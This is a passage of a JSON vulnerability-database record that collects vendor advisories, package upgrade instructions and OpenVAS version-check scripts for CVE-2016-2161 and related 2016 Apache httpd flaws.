2.4.0 to 2.4.23, malicious input to mod_auth_digest can cause the server to crash, and each instance continues to crash even for subsequently valid requests.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-27T21:29:00", "title": "CVE-2016-2161", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2161"], "modified": "2020-04-01T15:15:00", "cpe": ["cpe:/a:apache:http_server:2.4.19", "cpe:/a:apache:http_server:2.4.12", "cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.4.21", "cpe:/a:apache:http_server:2.4.20", "cpe:/a:apache:http_server:2.4.10", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.4.8", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.4.9", "cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.4.16", "cpe:/a:apache:http_server:2.4.22", "cpe:/a:apache:http_server:2.4.23", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.0", "cpe:/a:apache:http_server:2.4.14"], "id": "CVE-2016-2161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2161", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:http_server:2.4.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*"]}], "slackware": [{"lastseen": "2020-10-25T16:36:02", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-5387", "CVE-2016-8740", "CVE-2016-8743"], "description": "New httpd packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/httpd-2.4.25-i586-1_slack14.2.txz: Upgraded.\n This update fixes the following security issues:\n * CVE-2016-8740: mod_http2: Mitigate DoS memory exhaustion via endless\n CONTINUATION frames.\n * CVE-2016-5387: core: Mitigate [f]cgi \"httpoxy\" issues.\n * CVE-2016-2161: mod_auth_digest: Prevent segfaults during client entry\n allocation when the shared memory space is exhausted.\n * CVE-2016-0736: mod_session_crypto: Authenticate the session data/cookie\n with a MAC (SipHash) to prevent deciphering or tampering with a padding\n oracle attack.\n * CVE-2016-8743: Enforce HTTP request grammar corresponding to RFC7230 for\n request lines and request headers, to prevent response splitting and\n cache pollution by malicious clients or downstream proxies.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8740\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5387\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2161\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8743\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.25-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.25-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.25-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.25-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/httpd-2.4.25-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/httpd-2.4.25-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.25-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.25-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n186e15ba143536daa3314076002c7821 httpd-2.4.25-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nf9eb3bf2a68a9bc8637a8d53a26ab6dd httpd-2.4.25-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\ne416a15941f2c8c0eaebbd63e69164ff httpd-2.4.25-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nf1b4ccd7391b58bf9f78648c8c3c86b4 httpd-2.4.25-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n18e672179bd4136eea419fbcdf1d587b httpd-2.4.25-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n250aa6c0782aefd28539e3c3f2ddde95 httpd-2.4.25-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n732e51e650d3287f4f415a0536c9c8fe n/httpd-2.4.25-i586-1.txz\n\nSlackware x86_64 -current package:\nab4f1612c10531fce830aa1f562a9dd5 n/httpd-2.4.25-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.25-i586-1_slack14.2.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "modified": "2016-12-24T01:35:08", "published": "2016-12-24T01:35:08", "id": "SSA-2016-358-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.495677", "type": "slackware", "title": "[slackware-security] httpd", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:25", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-8740", "CVE-2016-5387", "CVE-2016-0736"], "description": "\nApache Software Foundation reports:\n\nPlease reference CVE/URL list for details\n\n", "edition": 9, "modified": "2016-12-22T00:00:00", "published": "2016-12-20T00:00:00", "id": "862D6AB3-C75E-11E6-9F98-20CF30E32F6D", "href": "https://vuxml.freebsd.org/freebsd/862d6ab3-c75e-11e6-9f98-20cf30e32f6d.html", "title": "Apache httpd -- several vulnerabilities", "type": "freebsd", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:25", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8740"], "description": "\nmod_http2 reports:\n\nThe Apache HTTPD web server (from 2.4.17-2.4.23) did not apply\n\t limitations on request headers correctly when experimental module\n\t for the HTTP/2 protocol is used to access a resource.\nThe net result is that a the server allocates too much memory\n\t instead of denying the request. This can lead to memory exhaustion\n\t of the server by a properly crafted request.\n\n", "edition": 5, "modified": "2016-12-06T00:00:00", "published": "2016-12-06T00:00:00", "id": "CB0BF1EC-BB92-11E6-A9A5-B499BAEBFEAF", "href": "https://vuxml.freebsd.org/freebsd/cb0bf1ec-bb92-11e6-a9a5-b499baebfeaf.html", "title": "Apache httpd -- denial of service in HTTP/2", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:14", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "[2.4.6-45.0.1.4]\n- replace index.html with Oracle's index page oracle_index.html\n[2.4.6-45.4]\n- Resolves: #1396197 - Backport: mod_proxy_wstunnel - AH02447: err/hup\n on backconn\n[2.4.6-45.3]\n- prefork: fix delay completing graceful restart (#1327624)\n- mod_ldap: fix authz regression, failing to rebind (#1415257)\n[2.4.6-45.2]\n- updated patch for CVE-2016-8743\n[2.4.6-45.1]\n- Resolves: #1412975 - CVE-2016-0736 CVE-2016-2161 CVE-2016-8743 httpd: various\n flaws", "edition": 5, "modified": "2017-04-12T00:00:00", "published": "2017-04-12T00:00:00", "id": "ELSA-2017-0906", "href": "http://linux.oracle.com/errata/ELSA-2017-0906.html", "title": "httpd security and bug fix update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-8743"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2016-12-25T03:26:41", "published": "2016-12-25T03:26:41", "id": "FEDORA:A9BA0608752F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: httpd-2.4.25-1.fc24", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-8743"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2016-12-25T02:14:19", "published": "2016-12-25T02:14:19", "id": "FEDORA:09EE06061CB6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: httpd-2.4.25-1.fc25", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8740"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2016-12-11T02:28:25", "published": "2016-12-11T02:28:25", "id": "FEDORA:15FCD60A94E9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: httpd-2.4.23-5.fc24", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8740"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2016-12-08T18:24:00", "published": "2016-12-08T18:24:00", "id": "FEDORA:E283A6139030", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: httpd-2.4.23-5.fc25", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:41:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "It was discovered that the Apache mod_session_crypto module was encrypting \ndata and cookies using either CBC or ECB modes. A remote attacker could \npossibly use this issue to perform padding oracle attacks. (CVE-2016-0736)\n\nMaksim Malyutin discovered that the Apache mod_auth_digest module \nincorrectly handled malicious input. A remote attacker could possibly use \nthis issue to cause Apache to crash, resulting in a denial of service. \n(CVE-2016-2161)\n\nDavid Dennerline and R\u00e9gis Leroy discovered that the Apache HTTP Server \nincorrectly handled unusual whitespace when parsing requests, contrary to \nspecifications. When being used in combination with a proxy or backend \nserver, a remote attacker could possibly use this issue to perform an \ninjection attack and pollute cache. This update may introduce compatibility \nissues with clients that do not strictly follow HTTP protocol \nspecifications. A new configuration option \"HttpProtocolOptions Unsafe\" can \nbe used to revert to the previous unsafe behaviour in problematic \nenvironments. (CVE-2016-8743)", "edition": 68, "modified": "2017-05-09T00:00:00", "published": "2017-05-09T00:00:00", "id": "USN-3279-1", "href": "https://ubuntu.com/security/notices/USN-3279-1", "title": "Apache HTTP Server vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "amazon": [{"lastseen": "2020-11-10T12:34:38", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "**Issue Overview:**\n\nThe following security-related issues were fixed:\n\nPadding oracle vulnerability in Apache mod_session_crypto ([CVE-2016-0736 __](<https://access.redhat.com/security/cve/CVE-2016-0736>)) \nDoS vulnerability in mod_auth_digest ([CVE-2016-2161 __](<https://access.redhat.com/security/cve/CVE-2016-2161>)) \nApache HTTP request parsing whitespace defects ([CVE-2016-8743 __](<https://access.redhat.com/security/cve/CVE-2016-8743>))\n\n \n**Affected Packages:** \n\n\nhttpd24\n\n \n**Issue Correction:** \nRun _yum update httpd24_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n mod24_ssl-2.4.25-1.68.amzn1.i686 \n httpd24-2.4.25-1.68.amzn1.i686 \n httpd24-debuginfo-2.4.25-1.68.amzn1.i686 \n httpd24-devel-2.4.25-1.68.amzn1.i686 \n mod24_session-2.4.25-1.68.amzn1.i686 \n mod24_ldap-2.4.25-1.68.amzn1.i686 \n mod24_proxy_html-2.4.25-1.68.amzn1.i686 \n httpd24-tools-2.4.25-1.68.amzn1.i686 \n \n noarch: \n httpd24-manual-2.4.25-1.68.amzn1.noarch \n \n src: \n httpd24-2.4.25-1.68.amzn1.src \n \n x86_64: \n httpd24-2.4.25-1.68.amzn1.x86_64 \n httpd24-debuginfo-2.4.25-1.68.amzn1.x86_64 \n mod24_session-2.4.25-1.68.amzn1.x86_64 \n mod24_proxy_html-2.4.25-1.68.amzn1.x86_64 \n mod24_ldap-2.4.25-1.68.amzn1.x86_64 \n mod24_ssl-2.4.25-1.68.amzn1.x86_64 \n httpd24-devel-2.4.25-1.68.amzn1.x86_64 \n httpd24-tools-2.4.25-1.68.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2017-01-19T16:30:00", "published": "2017-01-19T16:30:00", "id": "ALAS-2017-785", "href": "https://alas.aws.amazon.com/ALAS-2017-785.html", "title": "Medium: httpd24", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-08-12T00:51:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3796-1 security@debian.org\nhttps://www.debian.org/security/ Sebastien Delafond\nFebruary 26, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apache2\nCVE ID : CVE-2016-0736 CVE-2016-2161 CVE-2016-8743\n\nSeveral vulnerabilities were discovered in the Apache2 HTTP server.\n\nCVE-2016-0736\n\n RedTeam Pentesting GmbH discovered that mod_session_crypto was\n vulnerable to padding oracle attacks, which could allow an attacker\n to guess the session cookie.\n\nCVE-2016-2161\n\n Maksim Malyutin discovered that malicious input to mod_auth_digest\n could cause the server to crash, causing a denial of service.\n\nCVE-2016-8743\n\n David Dennerline, of IBM Security&#x27;s X-Force Researchers, and R\u00e9gis\n Leroy discovered problems in the way Apache handled a broad pattern\n of unusual whitespace patterns in HTTP requests. In some\n configurations, this could lead to response splitting or cache\n pollution vulnerabilities. To fix these issues, this update makes\n Apache httpd be more strict in what HTTP requests it accepts.\n\n If this causes problems with non-conforming clients, some checks can\n be relaxed by adding the new directive &quot;HttpProtocolOptions unsafe&quot;\n to the configuration.\n\nThis update also fixes the issue where mod_reqtimeout was not enabled\nby default on new installations.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.4.10-10+deb8u8.\n\nFor the testing (stretch) and unstable (sid) distributions, these\nproblems have been fixed in version 2.4.25-1.\n\nWe recommend that you upgrade your apache2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 10, "modified": "2017-02-26T18:27:01", "published": "2017-02-26T18:27:01", "id": "DEBIAN:DSA-3796-1:1E6E3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00049.html", "title": "[SECURITY] [DSA 3796-1] apache2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2017-08-23T11:20:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "Several vulnerabilities were discovered in the Apache2 HTTP server.\n\nCVE-2016-0736 \nRedTeam Pentesting GmbH discovered that mod_session_crypto was\nvulnerable to padding oracle attacks, which could allow an attacker\nto guess the session cookie.\n\nCVE-2016-2161 \nMaksim Malyutin discovered that malicious input to mod_auth_digest\ncould cause the server to crash, causing a denial of service.\n\nCVE-2016-8743 \nDavid Dennerline, of IBM Security", "modified": "2017-08-08T00:00:00", "published": "2017-02-26T00:00:00", "id": "OPENVAS:703796", "href": "http://plugins.openvas.org/nasl.php?oid=703796", "type": "openvas", "title": "Debian Security Advisory DSA 3796-1 (apache2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3796.nasl 6873 2017-08-08 12:35:26Z teissa $\n# Auto-generated from advisory DSA 3796-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703796);\n script_version(\"$Revision: 6873 $\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_name(\"Debian Security Advisory DSA 3796-1 (apache2 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-08-08 14:35:26 +0200 (Tue, 08 Aug 2017) $\");\n script_tag(name: \"creation_date\", value: \"2017-02-26 00:00:00 +0100 (Sun, 26 Feb 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2017/dsa-3796.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"apache2 on Debian Linux\");\n script_tag(name: \"insight\", value: \"The Apache HTTP Server Project's goal is to build a secure, efficient and\nextensible HTTP server as standards-compliant open source software. The\nresult has long been the number one web server on the Internet.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), these problems have been fixed in\nversion 2.4.10-10+deb8u8.\n\nFor the testing (stretch) and unstable (sid) distributions, these\nproblems have been fixed in version 2.4.25-1.\n\nWe recommend that you upgrade your apache2 packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were discovered in the Apache2 HTTP server.\n\nCVE-2016-0736 \nRedTeam Pentesting GmbH discovered that mod_session_crypto was\nvulnerable to padding oracle attacks, which could allow an attacker\nto guess the session cookie.\n\nCVE-2016-2161 \nMaksim Malyutin discovered that malicious input to mod_auth_digest\ncould cause the server to crash, causing a denial of service.\n\nCVE-2016-8743 \nDavid Dennerline, of IBM Security's X-Force Researchers, and R\u00e9gis\nLeroy discovered problems in the way Apache handled a broad pattern\nof unusual whitespace patterns in HTTP requests. In some\nconfigurations, this could lead to response splitting or cache\npollution vulnerabilities. To fix these issues, this update makes\nApache httpd be more strict in what HTTP requests it accepts.\n\nIf this causes problems with non-conforming clients, some checks can\nbe relaxed by adding the new directive HttpProtocolOptions unsafe \n\nto the configuration.\n\nThis update also fixes the issue where mod_reqtimeout was not enabled\nby default on new installations.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-ssl-dev\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-macro\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-proxy-html\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-01-27T18:40:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171086", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171086", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1086)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1086\");\n script_version(\"2020-01-23T10:48:38+0000\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:48:38 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:48:38 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1086)\");\n 